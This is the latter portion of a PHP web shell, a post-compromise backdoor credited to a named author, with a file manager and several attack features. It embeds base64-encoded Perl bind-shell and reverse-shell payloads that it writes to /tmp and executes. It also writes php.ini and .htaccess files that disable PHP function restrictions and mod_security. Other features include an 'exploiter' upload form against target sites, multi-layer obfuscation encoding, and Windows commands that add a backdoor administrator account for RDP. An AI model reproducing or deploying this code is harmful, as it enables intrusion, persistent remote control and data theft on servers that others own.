2795.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2796.     <input type='submit' name='sub_bp' value='>>'>
2797.     </form>
2798.     <form method='post'>
2799.     <u>Back Connect:</u> <br>
2800.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2801.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2802.     <input type='submit' name='sub_bc' value='>>'>
2803.     </form>";
2804.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2805.     if(isset($_POST['sub_bp'])) {
2806.         $f_bp = fopen("/tmp/bp.pl", "w");
2807.         fwrite($f_bp, base64_decode($bind_port_p));
2808.         fclose($f_bp);
2809.  
2810.         $port = $_POST['port_bind'];
2811.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2812.         sleep(1);
2813.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2814.         unlink("/tmp/bp.pl");
2815.     }
2816.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2817.     if(isset($_POST['sub_bc'])) {
2818.         $f_bc = fopen("/tmp/bc.pl", "w");
2819.         fwrite($f_bc, base64_decode($bind_connect_p));
2820.         fclose($f_bc);
2821.  
2822.         $ipbc = $_POST['ip_bc'];
2823.         $port = $_POST['port_bc'];
2824.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2825.         sleep(1);
2826.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2827.         unlink("/tmp/bc.pl");
2828.     }
2829. } elseif($_GET['do'] == 'csrf') {
2830. ?>      <html>
2831. <title>CSRF EXPLOITER ONLINE</title>
2832. <center><br><br><br><br>
2833. <font color=white>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
2834. <center>
2835. <form method="post">
2836. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
2837. POST File: <input type="text" name="pf" size="50" height="10" placeholder="See above^" style="margin: 5px auto; padding-left: 5px;" required><br>
2838. <input type="submit" name="d" value="Lock!">
2839. </form>
2840. <?php
2841. //gak penting
2842.      @$url = $_POST['url'];
2843.      @$pf = $_POST['pf'];
2844.      @$d = $_POST['d'];
2845. if($d) {
2846.     //baccod
2847.    
2848.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
2849. }
2850. ?>
2851. </form>
2852. </html>
2853. <?php
2854.  
2855. }
2856. function parah($pastebin, $nama_file){
2857.     $usa = file_get_contents("$pastebin");
2858.     $frr = fopen("$nama_file", 'w');
2859.     fwrite($frr, $usa);
2860. }
2861. if($_GET['do'] == 'bypass'){
2862.         echo "<center>";
2863.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
2864.         if(isset($_POST['ini']))
2865. {
2866.         $file = fopen("php.ini","w");
2867.         echo fwrite($file,"disable_functions=none
2868. safe_mode = Off
2869.     ");
2870.         fclose($file);
2871.         echo "<a href='php.ini'>click here!</a>";
2872. }       if(isset($_POST['htce']))
2873. {
2874.         $file = fopen(".htaccess","w");
2875.         echo fwrite($file,"<IfModule mod_security.c>
2876. SecFilterEngine Off
2877. SecFilterScanPOST Off
2878. </IfModule>
2879.     ");
2880.         fclose($file);
2881.         echo "htaccess successfully created!";
2882. }
2883.         echo"</center>";
2884. } elseif($_GET['do'] == 'endec') {
2885. $text = $_POST['code'];
2886. echo "<center>
2887. <form method='post'><br>
2888. <textarea placeholder='ENTER THE TEXT THAT WANT TO ENCRYPT / DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
2889. <select class='inputz' size='1' name='ope'>
2890. <option value='urlencode'>url</option>
2891. <option value='json'>json</option>
2892. <option value='ur'>convert_uu</option>
2893. <option value='base64'>Base64</option>
2894. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
2895. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
2896. <option value='coeg'>gzinflate - base64</option>
2897. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
2898. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
2899. <option value='str2'>str_rot13 - base64</option>
2900. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
2901. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
2902. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 -  base64</option>
2903. <option value='gzpress'>gzcompress - base64</option>
2904. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
2905. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
2906. </form>";
2907. $submit = $_POST['submit'];
2908. if (isset($submit)){
2909. $op = $_POST["ope"];
2910. switch ($op) {case 'base64': $codi=base64_encode($text);
2911. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
2912. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
2913. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
2914. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
2915. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
2916. break;case 'urlencode' : $codi=rawurlencode($text);
2917. break;case 'ur' : $codi=convert_uuencode($text);
2918. break;case 'json' : $codi=json_encode(utf8_encode($text));
2919. break;case 'str2' : $codi=base64_encode(str_rot13($text));
2920. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
2921. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
2922. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
2923. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
2924. break;default:break;}}
2925. $submit = $_POST['submits'];
2926. if (isset($submit)){
2927. $op = $_POST["ope"];
2928. switch ($op) {case 'base64': $codi=base64_decode($text);
2929. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
2930. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
2931. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
2932. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
2933. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
2934. break;case 'urlencode' : $codi=rawurldecode($text);
2935. break;case 'ur' : $codi=convert_uudecode($text);
2936. break;case 'json' : $codi=utf8_decode(json_decode($text));
2937. break;case 'str2' : $codi=str_rot13(base64_decode($text));
2938. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
2939. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
2940. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
2941. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
2942. break;default:break;}}
2943. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
2944. fwrite($myfile, $codi);
2945. fclose($myfile);
2946. echo "<center><div id='kotakan'><br>
2947. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
2948. } elseif($_GET['do'] == 'about') {
2949.         echo '<center><font size="6"color=red>----------------------------------- </font</center>';
2950.     echo '<center><font size="6"color=red>fucking crazy , have nothing to lose </font</center>';
2951.      echo'<center><img src="https://image.ibb.co/nCYvNU/862d704401eb3f0252f9f477c381a0d8.png" width="180" height="180" title="Fuck You" align="middle" alt="Fuck You" align="middle" /> </center>';
2952.  
2953. } elseif($_GET['do'] == 'contact') {
2954.     echo "<center><br><font size='6'>--=[ Contact Me ]=--</font><br><br>
2955.     <table><td style='background-color: transparent;text-align:center;border: 2px lime dotted;width:300px;height:250px;'>
2956.     <font color='pink'>Email : ameer7awwad@gmail.com <br>Facebook : <a href='https://www.facebook.com/6xxxx' target='_blank'>@6xxxx</a>   <br>Twitter : <a href=https://twitter.com/ameer7awwad>@ameer7awwad</a></font><br></tr></td></table></center>";
2957.  
2958. } elseif($_GET['do'] == 'krdp_shell') {
2959.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2960.         if($_POST['create']) {
2961.             $user = htmlspecialchars($_POST['user']);
2962.             $pass = htmlspecialchars($_POST['pass']);
2963.             if(preg_match("/$user/", exe("net user"))) {
2964.                 echo "[INFO] -> <font color=red>user <font color=white>$user</font> already available</font>";
2965.             } else {
2966.                 $add_user   = exe("net user $user $pass /add");
2967.                 $add_groups1 = exe("net localgroup Administrators $user /add");
2968.                 $add_groups2 = exe("net localgroup Administrator $user /add");
2969.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
2970.                 echo "[ RDP ACCOUNT INFO ]<br>
2971.                 ------------------------------<br>
2972.                 IP: <font color=white>".$ip."</font><br>
2973.                 Username: <font color=white>$user</font><br>
2974.                 Password: <font color=white>$pass</font><br>
2975.                 ------------------------------<br><br>
2976.                 [ STATUS ]<br>
2977.                 ------------------------------<br>
2978.                 ";
2979.                 if($add_user) {
2980.                     echo "[add user] -> <font color='white'>Succeed</font><br>";
2981.                 } else {
2982.                     echo "[add user] -> <font color='red'>Failed</font><br>";
2983.                 }
2984.                 if($add_groups1) {
2985.                     echo "[add localgroup Administrators] -> <font color='white'>Succeed</font><br>";
2986.                 } elseif($add_groups2) {
2987.                     echo "[add localgroup Administrator] -> <font color='white'>Succeed</font><br>";
2988.                 } elseif($add_groups3) {
2989.                     echo "[add localgroup Administrateur] -> <font color='white'>Succeed</font><br>";
2990.                 } else {
2991.                     echo "[add localgroup] -> <font color='red'>Failed</font><br>";
2992.                 }
2993.                 echo "------------------------------<br>";
2994.             }
2995.         } elseif($_POST['s_opsi']) {
2996.             $user = htmlspecialchars($_POST['r_user']);
2997.             if($_POST['opsi'] == '1') {
2998.                 $cek = exe("net user $user");
2999.                 echo "Checking username <font color=white>$user</font> ....... ";
3000.                 if(preg_match("/$user/", $cek)) {
3001.                     echo "[ <font color=white>already available</font> ]<br>
3002.                     ------------------------------<br><br>
3003.                     <pre>$cek</pre>";
3004.                 } else {
3005.                     echo "[ <font color=red>not available</font> ]";
3006.                 }
3007.             } elseif($_POST['opsi'] == '2') {
3008.                 $cek = exe("net user $user Ameer_Awwad & MHM");
3009.                 if(preg_match("/$user/", exe("net user"))) {
3010.                     echo "[change password: <font color=red>Ameer_Awwad & MHM </font>] -> ";
3011.                     if($cek) {
3012.                         echo "<font color=white>Succeed</font>";
3013.                     } else {
3014.                         echo "<font color=red>Failed</font>";
3015.                     }
3016.                 } else {
3017.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> not available</font>";
3018.                 }
3019.             } elseif($_POST['opsi'] == '3') {
3020.                 $cek = exe("net user $user /DELETE");
3021.                 if(preg_match("/$user/", exe("net user"))) {
3022.                     echo "[remove user: <font color=white>$user</font>] -> ";
3023.                     if($cek) {
3024.                         echo "<font color=white>Succeed</font>";
3025.                     } else {
3026.                         echo "<font color=red>Failed</font>";
3027.                     }
3028.                 } else {
3029.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> not available</font>";
3030.                 }
3031.             } else {
3032.                 //
3033.             }
3034.         } else {
3035.             echo "-- Create RDP --<br>
3036.             <form method='post'>
3037.             <input type='text' name='user' placeholder='username' value='Ameer_Awwad & MHM' required>
3038.             <input type='text' name='pass' placeholder='password' value='MYSteam2018' required>
3039.             <input type='submit' name='create' value='>>'>
3040.             </form>
3041.             -- Option --<br>
3042.             <form method='post'>
3043.             <input type='text' name='r_user' placeholder='username' required>
3044.             <select name='opsi'>
3045.             <option value='1'>Check Username</option>
3046.             <option value='2'>Change Password</option>
3047.             <option value='3'>Delete Username</option>
3048.             </select>
3049.             <input type='submit' name='s_opsi' value='>>'>
3050.             </form>
3051.             ";
3052.         }
3053.     } else {
3054.         echo "<font color=red> This feature can only be used in Windows Server.</font>";
3055.     }
3056. } elseif($_GET['act'] == 'newfile') {
3057.     if($_POST['new_save_file']) {
3058.         $newfile = htmlspecialchars($_POST['newfile']);
3059.         $fopen = fopen($newfile, "a+");
3060.         if($fopen) {
3061.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
3062.         } else {
3063.             $act = "<font color=red>permission denied</font>";
3064.         }
3065.     }
3066.     echo $act;
3067.     echo "<form method='post'>
3068.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
3069.     <input type='submit' name='new_save_file' value='Submit'>
3070.     </form>";
3071. } elseif($_GET['act'] == 'newfolder') {
3072.     if($_POST['new_save_folder']) {
3073.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
3074.         if(!mkdir($new_folder)) {
3075.             $act = "<font color=red>permission denied</font>";
3076.         } else {
3077.             $act = "<script>window.location='?dir=".$dir."';</script>";
3078.         }
3079.     }
3080.     echo $act;
3081.     echo "<form method='post'>
3082.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
3083.     <input type='submit' name='new_save_folder' value='Submit'>
3084.     </form>";
3085. } elseif($_GET['act'] == 'rename_dir') {
3086.     if($_POST['dir_rename']) {
3087.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
3088.         if($dir_rename) {
3089.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
3090.         } else {
3091.             $act = "<font color=red>permission denied</font>";
3092.         }
3093.     echo "".$act."<br>";
3094.     }
3095.     echo "<form method='post'>
3096.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
3097.     <input type='submit' name='dir_rename' value='rename'>
3098.     </form>";
3099. } elseif($_GET['act'] == 'delete_dir') {
3100.     if(is_dir($dir)) {
3101.         if(is_writable($dir)) {
3102.             @rmdir($dir);
3103.             @exe("rm -rf $dir");
3104.             @exe("rmdir /s /q $dir");
3105.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
3106.         } else {
3107.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
3108.         }
3109.     }
3110.     echo $act;
3111. } elseif($_GET['act'] == 'view') {
3112.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3113.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
3114. } elseif($_GET['act'] == 'edit') {
3115.     if($_POST['save']) {
3116.         $save = file_put_contents($_GET['file'], $_POST['src']);
3117.         if($save) {
3118.             $act = "<font color=white>Saved!</font>";
3119.         } else {
3120.             $act = "<font color=red>permission denied</font>";
3121.         }
3122.     echo "".$act."<br>";
3123.     }
3124.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3125.     echo "<form method='post'>
3126.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
3127.     <input type='submit' value='Save' name='save' style='width: 500px;'>
3128.     </form>";
3129. } elseif($_GET['act'] == 'rename') {
3130.     if($_POST['do_rename']) {
3131.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
3132.         if($rename) {
3133.             $act = "<script>window.location='?dir=".$dir."';</script>";
3134.         } else {
3135.             $act = "<font color=red>permission denied</font>";
3136.         }
3137.     echo "".$act."<br>";
3138.     }
3139.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3140.     echo "<form method='post'>
3141.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
3142.     <input type='submit' name='do_rename' value='rename'>
3143.     </form>";
3144. } elseif($_GET['act'] == 'delete') {
3145.     $delete = unlink($_GET['file']);
3146.     if($delete) {
3147.         $act = "<script>window.location='?dir=".$dir."';</script>";
3148.     } else {
3149.         $act = "<font color=red>permission denied</font>";
3150.     }
3151.     echo $act;
3152. } else {
3153.     if(is_dir($dir) === true) {
3154.         if(!is_readable($dir)) {
3155.             echo "<font color=red>can't open directory. ( not readable )</font>";
3156.         } else {
3157.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
3158.             <tr>
3159.             <th class="th_home"><center>Name</center></th>
3160.             <th class="th_home"><center>Type</center></th>
3161.             <th class="th_home"><center>Size</center></th>
3162.             <th class="th_home"><center>Last Modified</center></th>
3163.             <th class="th_home"><center>Owner/Group</center></th>
3164.             <th class="th_home"><center>Permission</center></th>
3165.             <th class="th_home"><center>Action</center></th>
3166.             </tr>';
3167.             $scandir = scandir($dir);
3168.             foreach($scandir as $dirx) {
3169.                 $dtype = filetype("$dir/$dirx");
3170.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
3171.                 if(function_exists('posix_getpwuid')) {
3172.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
3173.                     $downer = $downer['name'];
3174.                 } else {
3175.                     //$downer = $uid;
3176.                     $downer = fileowner("$dir/$dirx");
3177.                 }
3178.                 if(function_exists('posix_getgrgid')) {
3179.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
3180.                     $dgrp = $dgrp['name'];
3181.                 } else {
3182.                     $dgrp = filegroup("$dir/$dirx");
3183.                 }
3184.                 if(!is_dir("$dir/$dirx")) continue;
3185.                 if($dirx === '..') {
3186.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
3187.                 } elseif($dirx === '.') {
3188.                     $href = "<a href='?dir=$dir'>$dirx</a>";
3189.                 } else {
3190.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
3191.                 }
3192.                 if($dirx === '.' || $dirx === '..') {
3193.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
3194.                     } else {
3195.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
3196.                 }
3197.                 echo "<tr>";
3198.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
3199.                 echo "<td class='td_home'><center>$dtype</center></td>";
3200.                 echo "<td class='td_home'><center>-</center></th></td>";
3201.                 echo "<td class='td_home'><center>$dtime</center></td>";
3202.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
3203.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
3204.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
3205.                 echo "</tr>";
3206.             }
3207.         }
3208.     } else {
3209.         echo "<font color=red>can't open directory.</font>";
3210.     }
3211.         foreach($scandir as $file) {
3212.             $ftype = filetype("$dir/$file");
3213.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
3214.             $size = filesize("$dir/$file")/1024;
3215.             $size = round($size,3);
3216.             if(function_exists('posix_getpwuid')) {
3217.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
3218.                 $fowner = $fowner['name'];
3219.             } else {
3220.                 //$downer = $uid;
3221.                 $fowner = fileowner("$dir/$file");
3222.             }
3223.             if(function_exists('posix_getgrgid')) {
3224.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
3225.                 $fgrp = $fgrp['name'];
3226.             } else {
3227.                 $fgrp = filegroup("$dir/$file");
3228.             }
3229.             if($size > 1024) {
3230.                 $size = round($size/1024,2). 'MB';
3231.             } else {
3232.                 $size = $size. 'KB';
3233.             }
3234.             if(!is_file("$dir/$file")) continue;
3235.             echo "<tr>";
3236.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
3237.             echo "<td class='td_home'><center>$ftype</center></td>";
3238.             echo "<td class='td_home'><center>$size</center></td>";
3239.             echo "<td class='td_home'><center>$ftime</center></td>";
3240.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
3241.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
3242.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
3243.             echo "</tr>";
3244.         }
3245.         echo "</table>";
3246.         if(!is_readable($dir)) {
3247.             //
3248.         } else {
3249.             echo "<hr>";
3250.         }
3251.     echo "<center>Recoded ".date("Y")." - <a href='https://www.facebook.com/6xxxx' target='_blank'><font color=white>By Ameer Awwad</font></a></center>";
3252. }
3253. ?>
3254. </html>